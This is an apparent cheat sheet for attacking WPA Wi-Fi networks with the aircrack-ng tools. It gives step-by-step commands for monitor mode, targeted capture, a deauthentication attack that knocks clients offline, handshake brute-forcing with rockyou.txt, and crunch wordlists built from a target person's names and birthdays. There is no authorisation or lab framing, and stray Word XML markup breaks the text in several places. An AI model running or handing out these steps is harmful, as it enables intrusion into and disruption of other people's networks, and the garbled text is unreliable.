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***Prework***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Plug in wireless card capable of monitor mode- when detected, issue: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Ifconfig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This will bring up a list of all available interfaces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In this example, we will use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wlan0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To enable monitor mode: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Ifconfig wlan0 down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Iwconfig wlan0 mode monitor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Ifconfig wlan0 up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***Scanning***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For a general scan of surrounding networks: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Airodump-ng [interface]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Airodump-ng wlan0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Starting airodump on the tagret ap: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Airodump-ng --channel [channel] --bssid [bssid] --write [file name] [interface]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Airodump-ng --channel 6 --bssid 11:22:33:33:44:55 --write fileName wlan0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Perform a deauthentication attack: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Aireplay-ng --deauth [number of deauth packets] -a [AP] -c [client] [interface]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Aireplay-ng --deauth 1000 -a 11:22:33:44:55:66 -c [66:55:44:33:22:11] wlan0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Once the handshake has been ascertained, you can use aircrack to bruteforce the key against a wordlist. In this example, we’ll use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rockyou.txt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To run aircrack-ng against captured handshake (.cap file):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Aircrack-ng [cap_file.cap] -w [wordlist.txt]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Aircrack-ng myFile.cap -w rockyou.txt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Try to add words that would be associated with the target [i.e. birthdays, names, dates- anything that may be a word present in the key for that particular person or organization]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***generating a word list with crunch***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Sometimes it will serve your purposes to create your own wordlists. This can be accomplished with a utility present by default in kali called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">crunch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./crunch [min size] [max size] [characters=lower|upper|numbers|symbols] -t [pattern] -o file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./crunch 6 8 123456”#$%! -t a@@@@b -o wordlist.txt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